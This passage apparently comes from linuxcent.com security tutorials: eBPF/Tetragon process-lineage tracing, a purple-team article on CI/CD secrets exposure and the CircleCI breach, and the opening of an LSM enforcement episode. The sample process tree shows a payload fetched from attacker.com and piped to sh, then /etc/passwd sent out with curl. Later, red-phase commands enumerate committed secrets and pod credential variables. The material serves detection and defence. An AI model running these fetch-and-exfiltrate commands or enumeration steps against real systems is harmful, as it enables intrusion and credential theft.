  └── sh (18293) — "sh -c curl http://attacker.com/payload.sh | sh"
        └── sh (18294) — "sh payload.sh"
              ├── cat (18295) — "/etc/passwd"
              └── curl (18296) — "http://attacker.com/exfil -d @/etc/passwd"

This tree is constructed entirely from kernel events. No application logging. No container stdout. No agent inside the container.


How Tetragon Stores the Process Tree in BPF Maps

bpftrace’s approach above produces an event stream — a log you reconstruct manually. Tetragon takes a different approach: it maintains a live process tree in BPF maps, updated on every fork and exec event, persistently queryable.

Kernel events (kprobe on clone, execve, exit)
      ↓
Tetragon eBPF programs
      ↓
Write to BPF_MAP_TYPE_HASH: process_cache
      key: PID
      value: {binary, args, start_time, parent_pid, pod_name, namespace, uid, gid, caps}
      ↓
Tetragon userspace agent
      reads process_cache on events
      enriches with Kubernetes pod metadata (from informer cache)
      exports to gRPC stream → observability backend

task_struct in BPF maps — Tetragon doesn’t store the raw task_struct pointer in its maps (pointers are not stable across process lifetime). Instead, it stores a snapshot of the relevant fields (PID, binary path, arguments, capabilities, cgroup path, start time) at the moment of the exec event, keyed by PID. When the process exits, the entry is kept in the cache for a configurable window to allow late-arriving events (like file closes or connection terminations) to be correlated back to the originating process.

To inspect Tetragon’s process cache directly:

# Find the Tetragon process cache map
bpftool map list | grep process_cache

# 112: hash  name process_cache  flags 0x0
#      key 4B  value 256B  max_entries 65536  memlock 16777216B

# Dump a few entries
bpftool map dump id 112 | head -60

# [{
#     "key": 18293,                           # ← PID
#     "value": {
#         "binary": "/bin/sh",
#         "args": "sh -c curl http://...",
#         "pid": 18293,
#         "ppid": 18201,
#         "uid": 1000,
#         "start_time": 1745296443,
#         "cgroup": "kubepods/burstable/pod3f8a21bc/.../payments"
#     }
# }]

The cgroup field maps directly to the pod — same path as /proc/<pid>/cgroup but captured at exec time and stored in kernel space.


Correlating Files and Connections to the Process Tree

Process lineage is most useful when combined with the file access and network connection events from the same process. Tetragon’s TracingPolicy supports this multi-event correlation natively:

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: observe-process-lineage
spec:
  kprobes:
    - call: "security_inode_permission"
      syscall: false
      args:
        - index: 0
          type: "inode"
      selectors:
        - matchNamespaces:
            - namespace: Net
              operator: "NotIn"
              values: ["1"]    # exclude host network namespace
          matchActions:
            - action: Post   # audit: log but don't block
    - call: "tcp_connect"
      syscall: false
      args:
        - index: 0
          type: "sock"
      selectors:
        - matchActions:
            - action: Post

With this policy active, Tetragon emits events for both file access and TCP connections, each carrying the full process context (PID, binary, pod, parent). Correlated by PID and timestamp:

tetra getevents | jq 'select(.process_kprobe.function_name == "tcp_connect") |
  {pid: .process_kprobe.process.pid,
   binary: .process_kprobe.process.binary,
   pod: .process_kprobe.process.pod.name,
   dst: .process_kprobe.args[0].sock_arg.daddr}'

Sample output:

{"pid": 18296, "binary": "/usr/bin/curl", "pod": "my-app-6d4f9-xk2p1", "dst": "93.184.216.34"}
{"pid": 18297, "binary": "/usr/bin/wget", "pod": "my-app-6d4f9-xk2p1", "dst": "93.184.216.34"}

PID 18296 and 18297 both connected to the same IP. Cross-reference with the process tree: those are the curl and wget spawned by the attacker’s payload script. The destination IP is the attacker’s infrastructure. The timeline is milliseconds-precise because the events are timestamped by the kernel at the hook point.


Building Process Lineage Without Tetragon

If you’re not running Tetragon, you can build a basic process lineage recorder with bpftrace that writes to a file:

# Record all exec events to a file — run in the background on the node
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("%llu EXEC pid=%-6d ppid=%-6d binary=%s\n",
           nsecs, pid, curtask->real_parent->tgid, str(args->filename));
}
tracepoint:sched:sched_process_exit {
    printf("%llu EXIT pid=%-6d comm=%s\n", nsecs, pid, comm);
}
' > /var/log/process-lineage.log &

# Tail the log for real-time observation
tail -f /var/log/process-lineage.log

Sample output:

1745296443123456789 EXEC pid=18293 ppid=18201 binary=/bin/sh
1745296443234567890 EXEC pid=18294 ppid=18293 binary=/bin/sh
1745296443345678901 EXEC pid=18295 ppid=18294 binary=/bin/cat
1745296443456789012 EXIT pid=18295 comm=cat
1745296443567890123 EXEC pid=18296 ppid=18294 binary=/usr/bin/curl
1745296443678901234 EXIT pid=18293 comm=sh

This file survives pod restarts because it’s on the node, not in the container. After the pod is restarted, the process lineage record is still on disk. You reconstruct the tree by grouping by ppid and ordering by timestamp.


⚠ Production Gotchas

Ringbuf saturation on high-process-churn nodes. Nodes running serverless workloads or short-lived batch jobs may spawn thousands of processes per minute. Hooking exec on every process at that rate generates a high ringbuf write volume. Filter at the eBPF level by cgroup (namespace) rather than in userspace — sending events to userspace only to discard them wastes ringbuf space and CPU. Tetragon’s namespace selector does this filtering in the eBPF program before the write.

The 15-character comm truncation. The comm field in task_struct is limited to 15 characters (plus null terminator). Process names longer than 15 characters are truncated. bpftrace‘s comm built-in has the same limit. For the full binary path, read from execve‘s filename argument at the tracepoint, not from comm.

PID reuse. Linux PIDs are reused after a process exits. In a high-churn environment, a PID you recorded as an attacker process may be reassigned to a legitimate process seconds later. Always pair PIDs with start time and cgroup path when correlating across events. Tetragon’s process cache keys on PID + start time to handle this.

Exec chains lose argument history. When execve replaces the process image, task_struct->comm changes but the PID does not. If the attacker’s shell runs exec bash to replace itself with a less suspicious binary name, the exec event captures the new binary — but the PID lineage still shows the parent correctly. Don’t rely on comm alone for process identity; always track the binary path from the exec event.

Process events don’t capture file content. You see that /bin/cat /etc/passwd ran. You don’t see what was in /etc/passwd at that moment unless you also capture file open/read events. Tetragon’s security_inode_permission hook tells you which files were accessed; capturing their content requires additional hooks on vfs_read with buffer capture, which is significantly higher overhead and requires careful data handling for sensitive files.


Quick Reference

What you want Command
Live exec trace (bpftrace) bpftrace -e 'tracepoint:syscalls:sys_enter_execve { printf(...) }'
Fork + exec tree Combine sys_exit_clone + sys_enter_execve traces, correlate by pid/ppid
Tetragon process events tetra getevents --event-types PROCESS_EXEC
Tetragon file + network tetra getevents --event-types PROCESS_KPROBE
Process cache map bpftool map list | grep process_cachebpftool map dump id N
Map PID to pod cat /proc/<pid>/cgroup → extract pod UID
Process exit events tracepoint:sched:sched_process_exit
Process event Kernel hook
New process spawned tracepoint:syscalls:sys_exit_clone (retval > 0 = child PID)
Binary executed tracepoint:syscalls:sys_enter_execve
Process exited tracepoint:sched:sched_process_exit
File opened tracepoint:syscalls:sys_enter_openat
Network connect kprobe:tcp_connect
DNS query tracepoint:syscalls:sys_enter_sendto (port 53)

Key Takeaways

  • Process lineage with eBPF hooks fork and exec at the kernel level — every process spawned on a node is recorded with its parent PID, binary path, arguments, and container context, regardless of what the container does to suppress application logs
  • The kernel’s task_struct is the authoritative source of process identity; eBPF programs read it at hook time and snapshot the relevant fields into BPF maps before the process can exit or be killed
  • Tetragon maintains a live process tree in BPF maps, correlates it with Kubernetes metadata, and makes it queryable by pod/namespace — the record persists after the pod is restarted
  • Incident reconstruction requires correlating process lineage with file access events and network connection events, all correlated by PID and timestamp — eBPF provides all three event streams from the same kernel attachment mechanism
  • PID reuse is a real concern in high-churn environments; always pair PIDs with start time and cgroup path when correlating across events
  • Kernel-level process events cannot be suppressed by a compromised container process — an attacker with root inside the container still cannot prevent bpftrace or Tetragon running on the host from recording their syscalls

What’s Next

EP14 is the payoff episode for the entire series arc so far. You’ve seen programs load (EP04), maps hold state (EP05), CO-RE keep programs portable (EP06), XDP and TC enforce at the network layer (EP07, EP08), bpftrace ask one-off questions (EP09), and the observability stack collect flow, DNS, and process data continuously (EP10, EP11, EP12, EP13).

EP14 synthesises all of it into four commands that tell you everything about any cluster you’ve never seen before — any eBPF-based tool, any vendor, any configuration. The audit playbook is what you run in the first 10 minutes when you inherit a cluster and need to understand what’s enforcing policy at the kernel level before you can trust anything it tells you.

Next: the audit playbook — four commands to see any cluster

Get EP14 in your inbox when it publishes → linuxcent.com/subscribe

CI/CD Secrets Exposure: How Supply Chain Attacks Target Your Pipeline

Reading Time: 11 minutes

What is purple team securityOWASP Top 10 mapped to cloud infrastructureCloud security breaches 2020–2025Broken access control in AWSMFA fatigue attacksCI/CD secrets exposure


TL;DR

  • CI/CD secrets exposure is OWASP A08 + A02: credentials committed to repositories or stored in pipeline environment variables can be exfiltrated when the platform is compromised, and automated scanners find them within seconds of a public commit
  • The CircleCI breach (January 2023): an engineer’s laptop was compromised via malware → session token stolen → attacker accessed CircleCI production systems → all customer environment variables (AWS keys, GitHub tokens, SSH keys) exfiltrated
  • The structural problem: long-lived credentials stored in a CI/CD platform are only as secure as the platform itself — if the platform is compromised, all stored secrets are compromised
  • The structural fix: OIDC workload identity replaces stored credentials with short-lived tokens issued at job runtime — there is nothing to exfiltrate
  • Pre-commit hooks and CI-layer secret scanning are detection layers, not structural fixes — they catch accidents, not determined attackers
  • Automated secret scanners (TruffleHog, Gitleaks) find credentials in public repos within 60–90 seconds of commit

OWASP Mapping: A08 Software and Data Integrity Failures — build pipeline integrity. A02 Cryptographic Failures — secrets stored in ways that allow exfiltration.


The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│                  CI/CD SECRETS ATTACK SURFACE                       │
│                                                                     │
│   VECTOR 1: COMMITTED TO VCS                                        │
│   Developer ── git commit ──▶ .env with AWS_SECRET_KEY              │
│   Automated scanner ──────▶  clones within 60 seconds              │
│   Attacker ───────────────▶  accesses AWS before dev notices        │
│                                                                     │
│   VECTOR 2: STORED IN CI/CD PLATFORM                                │
│   DevOps ─── configures ──▶  AWS_ACCESS_KEY_ID in CircleCI         │
│   Attacker compromises CircleCI → exfiltrates all org env vars      │
│                                                                     │
│   VECTOR 3: IN CONTAINER/PROCESS ENV                                │
│   kubectl exec / docker inspect ──▶  printenv shows credentials     │
│   Anyone with container exec access = credential access             │
│                                                                     │
│   VECTOR 4: IN BUILD ARTIFACTS / LOGS                               │
│   Build log: "Using token: ghp_xxxxxxxxxxxx..." → exposed in log   │
│                                                                     │
│   ═══════════════════════════════════════════════════════           │
│   STRUCTURAL FIX: OIDC WORKLOAD IDENTITY                            │
│   No stored credential → nothing to commit, nothing to exfiltrate  │
│   CI job requests token at runtime → 1-hour TTL → expired          │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘

CI/CD secrets exposure is not primarily a developer discipline problem — it is a structural problem. When credentials are stored in a CI/CD platform, in environment variables, or in version control, the only question is when they will be exposed, not whether. The structural answer replaces stored credentials with dynamically issued, short-lived tokens that cannot be exfiltrated because they don’t persist.


The 25-Minute Compromise: How Automated Scanning Works Against You

At 2:47 AM, a developer committed a .env file to a public GitHub repository. It contained:

DATABASE_URL=postgres://admin:prod_p@[email protected]:5432/customers
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
STRIPE_SECRET_KEY=sk_live_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
GITHUB_TOKEN=ghp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

At 2:48 AM — 60 seconds later — an automated scanner had cloned the repository. These scanners run continuously against GitHub’s public event stream, looking for credential patterns in new commits, new files, and new repository forks.

At 3:12 AM — 25 minutes after the commit — the database started receiving unusual queries. The automated scanning infrastructure is not operated by individuals manually watching for leaks. It is fully automated: pattern match → clone → test credential validity → if valid, begin exploitation or sell.

GitHub now runs its own secret scanning and immediately invalidates some credential types (GitHub tokens, AWS IAM keys partnered with AWS) when detected in public repositories. This covers a subset of credential types. It does not cover database passwords, service-specific tokens for non-partnered services, or private repository commits that become public via fork.


The CircleCI Breach: Platform-Level Credential Exfiltration

The CircleCI breach (January 2023) is the definitive example of CI/CD platform-level secrets exposure. The attack chain:

1. CircleCI engineer's laptop compromised via malware (initial vector not fully disclosed)
2. Malware steals a 2FA-authenticated SSO session token
3. Session token valid, not expired
4. Attacker uses session token to authenticate to CircleCI internal systems
5. From internal access, attacker reaches production database
6. Production database contains encrypted customer secrets (environment variables)
7. Database also contains the encryption keys (in accessible internal system)
8. Attacker exfiltrates: encrypted secrets + encryption keys = plaintext secrets

What was stored in CircleCI environment variables by customers:
– AWS IAM access key ID and secret access key pairs
– GitHub personal access tokens and OAuth tokens
– DockerHub credentials
– SSH private keys (for deployment access)
– Heroku API keys
– Stripe, Twilio, SendGrid API keys
– Internal service account credentials

CircleCI could not determine which customer secrets were accessed and which were not — they notified all customers to rotate all credentials stored in their system.

The scale of the blast radius: Any customer who had stored long-lived credentials in CircleCI environment variables was potentially compromised. The credential was valid. The CircleCI platform’s encryption only protected against offline attacks — an attacker with internal database access and access to the key management system had everything needed to decrypt.


Red Phase: Enumerating Secrets Exposure in Your Pipeline

Scanning Repositories for Committed Secrets

# Install: pip install trufflehog3 or use the Docker image
docker run --rm \
  -v "$(pwd):/repo" \
  trufflesecurity/trufflehog:latest \
  git file:///repo \
  --json \
  --only-verified \
  2>/dev/null | \
  jq '{
    file: .SourceMetadata.Data.Git.file,
    commit: .SourceMetadata.Data.Git.commit,
    detector: .DetectorName,
    verified: .Verified,
    line: .SourceMetadata.Data.Git.line
  }'
# Gitleaks: alternative scanner with SARIF output for CI integration
gitleaks detect \
  --source . \
  --report-format sarif \
  --report-path gitleaks-report.sarif \
  --verbose

# Or: scan entire git history (catches secrets that were committed then deleted)
gitleaks detect \
  --source . \
  --log-opts="--all" \
  --report-format json \
  --report-path gitleaks-history.json
# Scan a specific GitHub organization's public repositories
# (test your own org before red team exercises)
trufflehog github \
  --org your-github-org \
  --token "${GITHUB_TOKEN}" \
  --json \
  --only-verified \
  2>/dev/null | \
  jq '{
    repo: .SourceMetadata.Data.Github.repository,
    file: .SourceMetadata.Data.Github.file,
    detector: .DetectorName,
    verified: .Verified
  }'

Enumerating Secrets in CI/CD Platform Environment Variables

# GitHub Actions: list secrets defined in a repository
# (shows names only — values are not returned by API, but names reveal what's stored)
curl -H "Authorization: Bearer ${GITHUB_TOKEN}" \
  -H "Accept: application/vnd.github+json" \
  "https://api.github.com/repos/your-org/your-repo/actions/secrets" | \
  jq '.secrets[] | {name: .name, updated: .updated_at}'

# GitHub Actions: list organization-level secrets
curl -H "Authorization: Bearer ${GITHUB_TOKEN}" \
  -H "Accept: application/vnd.github+json" \
  "https://api.github.com/orgs/your-org/actions/secrets" | \
  jq '.secrets[] | {name: .name, visibility: .visibility, updated: .updated_at}'
# Check for credentials in running pod environment variables (Kubernetes)
# This is what an attacker with kubectl exec access would do
kubectl get pods -A -o json | \
  jq -r '.items[] | 
    .metadata.namespace + "/" + .metadata.name + ": " + 
    ([.spec.containers[].env[]? | 
      select(.name | test("KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL|API"; "i")) |
      .name
    ] | join(", "))' | \
  grep -v ": $"  # Only show pods with matching env var names

Testing Whether AWS Keys in CI/CD Are Over-Permissioned

# If you find an AWS access key in a scan — test its permissions
# (on your own test account's keys only)
aws sts get-caller-identity
# Returns: account, user/role ARN, caller ID

# What can this key do?
aws iam simulate-principal-policy \
  --policy-source-arn $(aws sts get-caller-identity --query Arn --output text) \
  --action-names "s3:*" "ec2:*" "iam:*" "sts:AssumeRole" \
  --query 'EvaluationResults[?EvalDecision==`allowed`].EvalActionName' \
  --output text

Blue Phase: Detection Across the Secret Lifecycle

GitHub Secret Scanning Alerts

# List secret scanning alerts in a repository via GitHub API
curl -H "Authorization: Bearer ${GITHUB_TOKEN}" \
  -H "Accept: application/vnd.github+json" \
  "https://api.github.com/repos/your-org/your-repo/secret-scanning/alerts?state=open" | \
  jq '.[] | {
    type: .secret_type,
    state: .state,
    created: .created_at,
    url: .html_url
  }'

CloudTrail: Detecting API Activity from CI/CD Credentials

When a CI/CD credential is used by an attacker, the CloudTrail events show unusual patterns:

# Find API calls from CI/CD credentials outside normal working hours
# or from unexpected IPs (attacker using the stolen key)
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=Username,AttributeValue=ci-deploy-user \
  --start-time "$(date -d '7 days ago' --iso-8601=seconds)" \
  --query 'Events[].{Time:EventTime,Name:EventName,IP:CloudTrailEvent}' \
  --output json | \
  jq '.[] | {
    time: .Time,
    event: .Name,
    ip: (.IP | fromjson | .sourceIPAddress),
    user_agent: (.IP | fromjson | .userAgent)
  }' | \
  jq 'select(.ip | test("^(10\\.|172\\.(1[6-9]|2[0-9]|3[01])\\.|192\\.168\\.)") | not)'
  # Filter: events from non-RFC1918 IPs (outside your known CI/CD IP ranges)

SIEM Query: Credential Used in Multiple Regions Simultaneously

A credential being used from multiple regions simultaneously is a strong indicator of compromise:

-- Athena query against CloudTrail logs
-- Detect: same access key used from multiple regions in same hour
SELECT
  userIdentity.accessKeyId,
  userIdentity.userName,
  COUNT(DISTINCT awsRegion) as region_count,
  ARRAY_AGG(DISTINCT awsRegion) as regions,
  COUNT(DISTINCT sourceIPAddress) as ip_count,
  ARRAY_AGG(DISTINCT sourceIPAddress) as source_ips,
  DATE_TRUNC('hour', from_iso8601_timestamp(eventTime)) as hour
FROM cloudtrail_logs
WHERE
  userIdentity.type = 'IAMUser'
  AND from_iso8601_timestamp(eventTime) > current_timestamp - interval '7' day
GROUP BY
  userIdentity.accessKeyId,
  userIdentity.userName,
  DATE_TRUNC('hour', from_iso8601_timestamp(eventTime))
HAVING COUNT(DISTINCT awsRegion) > 2
ORDER BY region_count DESC;

GuardDuty: Credential Exfiltration Indicators

# GuardDuty findings relevant to CI/CD credential compromise
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": [
          "UnauthorizedAccess:IAMUser/TorIPCaller",
          "UnauthorizedAccess:IAMUser/MaliciousIPCaller",
          "Discovery:IAMUser/AnomalousBehavior",
          "Exfiltration:IAMUser/AnomalousBehavior",
          "CredentialAccess:IAMUser/AnomalousBehavior"
        ]
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {type: .Type, user: .Resource.AccessKeyDetails.UserName, severity: .Severity}'

Purple Phase: The Structural Fix

Fix 1: OIDC Workload Identity — Eliminate Stored Credentials

This is the structural solution. Instead of storing an AWS IAM access key in your CI/CD platform, the CI/CD job authenticates to AWS using an OIDC token issued by the CI/CD provider. AWS validates the token against a pre-configured trust policy and issues temporary credentials valid for the duration of the job.

The OIDC workload identity approach eliminates static cloud access keys entirely — there is no secret to commit, no secret to exfiltrate from the CI/CD platform, and no long-lived credential to rotate on breach.

GitHub Actions with AWS OIDC — complete setup:

# .github/workflows/deploy.yml
name: Deploy to AWS

on:
  push:
    branches: [main]

permissions:
  id-token: write   # Required for OIDC token request
  contents: read

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Configure AWS credentials via OIDC
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::123456789012:role/github-actions-deploy-role
          role-session-name: github-actions-${{ github.run_id }}
          aws-region: us-east-1
          # No AWS_ACCESS_KEY_ID or AWS_SECRET_ACCESS_KEY needed

      - name: Deploy
        run: aws s3 sync ./dist s3://your-bucket/

AWS IAM trust policy for GitHub Actions OIDC:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::123456789012:oidc-provider/token.actions.githubusercontent.com"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
        },
        "StringLike": {
          "token.actions.githubusercontent.com:sub": "repo:your-org/your-repo:ref:refs/heads/main"
        }
      }
    }
  ]
}
# Create the OIDC provider in AWS (one-time setup)
aws iam create-open-id-connect-provider \
  --url https://token.actions.githubusercontent.com \
  --client-id-list sts.amazonaws.com \
  --thumbprint-list "6938fd4d98bab03faadb97b34396831e3780aea1"

# Create the IAM role with the trust policy above
aws iam create-role \
  --role-name github-actions-deploy-role \
  --assume-role-policy-document file://github-actions-trust-policy.json

# Attach a least-privilege policy to the role
aws iam attach-role-policy \
  --role-name github-actions-deploy-role \
  --policy-arn arn:aws:iam::123456789012:policy/deploy-policy

Fix 2: Pre-Commit Hooks — Catch Accidents Before They Reach VCS

Pre-commit hooks don’t stop a determined attacker. They catch accidents — the developer who forgets to move a .env file to .gitignore before staging all files.

# Install pre-commit framework
pip install pre-commit

# .pre-commit-config.yaml in your repository root
cat > .pre-commit-config.yaml << 'EOF'
repos:
  - repo: https://github.com/gitleaks/gitleaks
    rev: v8.18.4
    hooks:
      - id: gitleaks
        name: Detect hardcoded secrets
        entry: gitleaks protect --staged --redact --verbose
        language: golang
        pass_filenames: false

  - repo: https://github.com/pre-commit/pre-commit-hooks
    rev: v4.5.0
    hooks:
      - id: detect-private-key
      - id: check-added-large-files
        args: ['--maxkb=1000']
EOF

# Install the hooks in the local repository
pre-commit install

# Test against staged files
pre-commit run --all-files

Fix 3: CI-Layer Secret Scanning — Block Before Merge

# GitHub Actions: secret scanning as a required status check
# .github/workflows/secret-scan.yml
name: Secret Scan

on:
  pull_request:
    types: [opened, synchronize]

jobs:
  secret-scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0  # Full history for git log scanning

      - name: Run TruffleHog
        uses: trufflesecurity/trufflehog@main
        with:
          path: ./
          base: ${{ github.event.repository.default_branch }}
          head: HEAD
          extra_args: --only-verified --json
# GitLab CI: secret detection built-in template
include:
  - template: Security/Secret-Detection.gitlab-ci.yml

secret_detection:
  stage: test
  variables:
    SECRET_DETECTION_HISTORIC_SCAN: "true"  # Scan full history

Fix 4: Audit and Rotate Existing CI/CD Platform Secrets

After implementing OIDC, the migration path for existing stored credentials:

#!/bin/bash
# Purple Team EP06 — CI/CD Secrets Migration Audit
# Identifies AWS IAM keys stored in CI/CD that should be replaced with OIDC

echo "=== AWS IAM Keys Potentially Stored in CI/CD ==="
echo "--- Keys not used from expected CI/CD IPs in last 30 days ---"

# Get all IAM access keys
aws iam list-users --query 'Users[].UserName' --output text | tr '\t' '\n' | \
  while read user; do
    keys=$(aws iam list-access-keys --user-name "$user" \
      --query 'AccessKeyMetadata[?Status==`Active`].{Key:AccessKeyId,Created:CreateDate}' \
      --output json)

    if [ "$(echo "$keys" | jq length)" -gt 0 ]; then
      echo ""
      echo "User: $user"
      echo "$keys" | jq -r '.[] | "  Key: " + .Key + " | Created: " + .Created'

      # Check last used
      echo "$keys" | jq -r '.[].Key' | while read key_id; do
        last_used=$(aws iam get-access-key-last-used --access-key-id "$key_id" \
          --query 'AccessKeyLastUsed.{Date:LastUsedDate,Service:ServiceName,Region:Region}' \
          --output json)
        echo "  Last used: $(echo "$last_used" | jq -r '.Date // "Never"') | Service: $(echo "$last_used" | jq -r '.Service // "N/A"')"
      done
    fi
  done

echo ""
echo "=== MIGRATION CHECKLIST ==="
echo "  1. For each CI/CD IAM key above:"
echo "     a. Identify which CI/CD platform uses it"
echo "     b. Set up OIDC trust policy for that platform"
echo "     c. Update pipeline to use OIDC (no stored key)"
echo "     d. Disable and then delete the IAM key"
echo "     e. Verify pipelines still work"

Run This in Your Own Environment: Secrets Exposure Audit

#!/bin/bash
# Purple Team EP06 — CI/CD Secrets Exposure Audit
# Run from your workstation with git and trufflehog installed

echo "=== 1. Scan Local Repository for Committed Secrets ==="
if command -v trufflehog > /dev/null 2>&1; then
  trufflehog git file://$(pwd) --only-verified --json 2>/dev/null | \
    jq '{file: .SourceMetadata.Data.Git.file, detector: .DetectorName}' || \
    echo "  No verified secrets found in git history"
else
  echo "  Install trufflehog: pip install trufflehog3"
fi

echo ""
echo "=== 2. Check for .env Files in Git History ==="
git log --all --full-history -- "*.env" "**/.env" ".env.*" 2>/dev/null | \
  grep "^commit" | head -5 | \
  while read _ commit; do
    echo "  .env file committed: $commit"
    git show "$commit" --stat | head -3
  done

echo ""
echo "=== 3. Check Running Pods for Credential Env Vars (Kubernetes) ==="
if command -v kubectl > /dev/null 2>&1; then
  kubectl get pods -A -o json 2>/dev/null | \
    jq -r '.items[] | 
      .metadata.namespace + "/" + .metadata.name + ": " + 
      ([.spec.containers[].env[]? | 
        select(.name | test("KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL"; "i")) |
        .name
      ] | join(", "))' | \
    grep -v ": $" | head -20
else
  echo "  kubectl not found"
fi

echo ""
echo "=== 4. GitHub Actions Secrets Inventory ==="
if [ -n "${GITHUB_TOKEN}" ]; then
  REPO="your-org/your-repo"  # Update this
  curl -s -H "Authorization: Bearer ${GITHUB_TOKEN}" \
    -H "Accept: application/vnd.github+json" \
    "https://api.github.com/repos/${REPO}/actions/secrets" | \
    jq '.secrets[] | {name: .name, updated: .updated_at}'
else
  echo "  Set GITHUB_TOKEN to enumerate repository secrets"
fi

⚠ Common Mistakes When Addressing CI/CD Secrets Exposure

Treating secret scanning as the primary control. TruffleHog and Gitleaks catch what gets committed. They do not prevent the CircleCI attack class — an attacker who compromises the CI/CD platform itself bypasses all scanning controls. Scanning is detection; OIDC workload identity is prevention.

Rotating compromised keys without checking CloudTrail for use. When a secret is exposed, the first question is not “rotate it” — it is “was it used?” Check CloudTrail for any API activity from the key between the suspected exposure time and the rotation. If the key was used, you have an active incident, not just a credential rotation task.

Using OIDC trust policies that are too broad. The GitHub Actions OIDC trust policy in the fix section uses a StringLike condition on the sub claim to scope to a specific repository and branch. If you use StringLike: "*" instead, any GitHub Actions job in any repository can assume your role. Always scope OIDC trust policies to the specific repository, branch, and environment that needs the access.

Not scanning git history — only the working tree. Secrets that were committed and then deleted are still in git history. git rm removes the file from the working tree but not from the object store. TruffleHog and Gitleaks scan history by default when given the --all flag. Scanning only the current working tree misses all historical exposures.

Forgetting third-party GitHub Actions. The supply chain attack surface includes the Actions you reference in your workflows. An Action pinned to a mutable tag (@main, @v1) can be changed by the maintainer. Pin to a specific commit SHA and verify the Action’s provenance.

# Vulnerable: mutable tag
- uses: aws-actions/configure-aws-credentials@v4

# Secure: pinned SHA
- uses: aws-actions/configure-aws-credentials@e3dd6a429d7300a6a4c196c26e831c1e4c763fe4

Quick Reference

Secret Storage Pattern Risk Level Structural Fix
.env file committed to public repo Critical Pre-commit hook + OIDC
.env file committed to private repo High Git history purge + pre-commit hook + OIDC
Long-lived key in CI/CD env var High OIDC workload identity
Long-lived key in K8s Secret High Pod identity / IRSA / Workload Identity
Secret in build log output Medium Mask secrets in CI configuration
Secret in container env var Medium Vault agent / CSI secrets driver
Key referenced via AWS Secrets Manager Low (if scoped) Use for remaining static secrets

Key Takeaways

  • CI/CD secrets exposure is structural: long-lived credentials in a CI/CD platform are only as secure as that platform — the CircleCI breach proved that encryption alone is insufficient if the attacker can access the keys
  • Automated secret scanners find publicly committed credentials within 60–90 seconds — rotation must happen faster than that or assume compromise
  • Pre-commit hooks and CI secret scanning catch accidents; they do not prevent determined attackers who compromise the platform itself
  • OIDC workload identity is the structural fix: no stored credential means no credential to exfiltrate
  • When rotating a compromised key, check CloudTrail for usage between exposure and rotation before closing the incident
  • OIDC trust policies must be scoped to specific repositories and branches — a wildcard trust policy recreates the exposure in a different form
  • Pin third-party GitHub Actions to commit SHAs, not mutable tags — mutable tags are a supply chain attack surface

What’s Next

EP07 covers SSRF to cloud metadata: how an SSRF vulnerability in any application layer becomes a straight line to IAM credentials when IMDSv2 is not enforced. The Capital One breach anatomy — WAF SSRF → EC2 metadata → IAM role credentials → 100 million S3 records — in full technical detail, with the simulation commands and the one-line enforcement fix. If you’ve addressed identity and secrets, the network attack paths are where EP07 through EP10 focus.

Get EP07 in your inbox when it publishes → subscribe at linuxcent.com

LSM and Tetragon — When the Kernel Says No

Reading Time: 9 minutes

eBPF: From Kernel to Cloud, Episode 12
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP · TC eBPF · bpftrace · Network Flow Observability · DNS Observability · LSM and Tetragon


Architecture Overview

LSM BPF and Tetragon — kernel security enforcement architecture showing syscall interception and policy evaluation
LSM BPF hooks fire before every sensitive syscall — Tetragon uses them to enforce and kill, not just observe.

TL;DR

  • LSM eBPF Tetragon integrates Linux Security Module hooks with eBPF programs — enforcement happens at the syscall boundary, before the operation completes, with no detect-and-respond window
    (LSM hook = Linux Security Module hook: a callback point built into the kernel that fires before a security-relevant operation completes, allowing the security module to approve or reject it)
  • Falco and similar sidecar-based tools detect after the fact — the syscall returns, the file is written, the connection is established, the alert fires; with LSM, the syscall never returns success
  • BPF_PROG_TYPE_LSM is the eBPF program type that attaches to LSM hooks — introduced in kernel 5.7, stable in 5.10+; available on all current Ubuntu LTS, Fedora, and EKS/GKE nodes
  • Tetragon attaches eBPF programs to LSM hooks and kprobes simultaneously — observing and enforcing from the same kernel attachment point
  • Tetragon’s enforcement sends SIGKILL from within the kernel context — not from a userspace agent reading an audit log and then killing the process
  • Production caution: LSM enforce mode without thorough policy testing in audit mode first will kill legitimate workloads; always audit before enforce

EP11 showed how to observe DNS queries at the kernel level — seeing what a workload resolves before it establishes a connection. But observation is passive. It tells you what happened. LSM eBPF Tetragon changes the question entirely: instead of watching the workload, the kernel refuses the operation. This episode covers how that enforcement layer works and why the difference between “detect” and “prevent” matters in runtime security.

Quick Check: Is Your Cluster Running LSM-Based Enforcement?

# On any cluster node — what security modules are active?
cat /sys/kernel/security/lsm

# Expected output on a modern kernel:
# lockdown,capability,landlock,yama,apparmor,bpf
#                                              ^^^
#                            "bpf" here means BPF LSM is enabled
# Is Tetragon running on this cluster?
kubectl get pods -n kube-system -l app.kubernetes.io/name=tetragon

# If Tetragon is present, check what TracingPolicies are enforcing:
kubectl get tracingpolicies -A

